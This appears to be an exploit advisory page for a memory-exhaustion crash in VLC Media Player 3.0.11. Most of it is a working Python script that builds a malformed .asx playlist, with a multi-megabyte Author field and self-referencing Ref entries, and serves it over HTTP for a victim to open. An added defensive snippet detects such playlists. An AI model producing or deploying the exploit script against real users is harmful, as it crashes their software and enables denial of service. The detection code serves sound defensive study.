VLC Media Player 3.0.11 - .asx Memory Exhaustion

2020.09.19
albalawi-s (SA)
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: VLC Media Player 3.0.11 - .asx Memory Exhaustion
# Author: albalawi-s
# Vendor Website : http://www.videolan.org
# Tested on: Windows 10 (64 bit)
#video: https://youtu.be/pVG_v-Qh9F0

import BaseHTTPServer
import sys

test="fuzz.asx"
s=("\x3c\x41\x73\x78\x20\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x22\x33\x2e\x30\x22\x20\x3e\x20\x0a\x20\x20\x3c\x50\x61\x72\x61\x6d\x20\x4e\x61\x6d\x65\x20\x3d\x20\x22\x41\x6c\x6c\x6f\x77\x53\x68\x75\x66\x66\x6c\x65\x22\x20\x56\x61\x6c\x75\x65\x20\x3d\x20\x22\x79\x65\x73\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x45\x6e\x74\x72\x79\x3e\x20\x0a\x09\x3c\x41\x75\x74\x68\x6f\x72\x20\x3e"
   +'\x41'*2072480
   +"\x3c\x2f\x41\x75\x74\x68\x6f\x72\x3e\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x41\x75\x74\x68\x6f\x72\x20\x3e\x3c\x2f\x41\x75\x74\x68\x6f\x72\x3e\x09\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x09\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x09\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x09\x3c\x52\x65\x66\x20\x68\x72\x65\x66\x20\x3d\x20\x22"+test
   +"\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x2f\x45\x6e\x74\x72\x79\x3e\x0a\x3c\x2f\x41\x73\x78\x3e")

fff=open(test,'w')
fff.write(s)
fff.close()

from SimpleHTTPServer import SimpleHTTPRequestHandler

HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"

if sys.argv[1:]:
    port = int(sys.argv[1])
else:
    port =8080
server_address = ('192.168.1.4',port)

HandlerClass.protocol_version = Protocol
httpd = ServerClass(server_address, HandlerClass)

sa = httpd.socket.getsockname()
print sa[0],sa[1],'fuzz4.asx'
print "open vlc and open file fuzz4.asx or ctrl+V paste http://ip:port/{}".format(test)
print "http://{}:{}/{}".format(sa[0],sa[1],test)
httpd.serve_forever()
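
Added example, not part of the original advisory or the author's code: a pre-open check for ASX playlists that flags the two properties visible in the file built above, a multi-megabyte Author text and Ref entries whose href is the playlist's own file name. The function names and both size limits are assumptions chosen for illustration, and the sample playlists are constructed.

```python
import re

# Assumed policy limits (not from the page); tune for your environment.
MAX_FILE_BYTES = 1 << 20   # whole playlist
MAX_TEXT_BYTES = 4096      # text of one metadata element

# ASX tags are case-insensitive and the page's file puts spaces around "=".
TEXT_RE = re.compile(rb"<\s*(author|title|abstract|copyright)\b[^>]*>([^<]*)", re.I)
REF_RE = re.compile(rb"<\s*(?:ref|entryref)\b[^>]*?href\s*=\s*\"([^\"]*)\"", re.I)


def inspect_asx(data: bytes, own_name: str) -> list:
    """Return a list of findings for one playlist; empty means nothing flagged."""
    findings = []
    if len(data) > MAX_FILE_BYTES:
        findings.append("file size %d exceeds %d" % (len(data), MAX_FILE_BYTES))
    for m in TEXT_RE.finditer(data):
        if len(m.group(2)) > MAX_TEXT_BYTES:
            tag = m.group(1).decode("ascii").lower()
            findings.append("oversized <%s> text: %d bytes" % (tag, len(m.group(2))))
    own = own_name.lower().encode()
    self_refs = 0
    for m in REF_RE.finditer(data):
        # Compare only the last path segment so URLs and local paths both match.
        leaf = re.split(rb"[/\\]", m.group(1))[-1].lower()
        if leaf == own:
            self_refs += 1
    if self_refs:
        findings.append("%d Ref entries point back to %s" % (self_refs, own_name))
    return findings


def make_sample(author_len: int, ref: str) -> bytes:
    """Constructed sample with the same element layout as the page's file."""
    return (b'<Asx Version = "3.0" >\n  <Entry>\n\t<Author >' + b"A" * author_len
            + b'</Author>\n    <Ref href = "' + ref.encode() + b'" />\n'
            + b'\t<Ref href = "' + ref.encode() + b'" />\n  </Entry>\n</Asx>')


if __name__ == "__main__":
    for name, blob in [("ok.asx", make_sample(12, "http://example.test/clip.wmv")),
                       ("loop.asx", make_sample(5000, "loop.asx"))]:
        print(name, inspect_asx(blob, name) or "clean")
```

A mail or web gateway could run such a check on .asx attachments and downloads and quarantine any file that returns findings.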


Copyright 2024, cxsecurity.com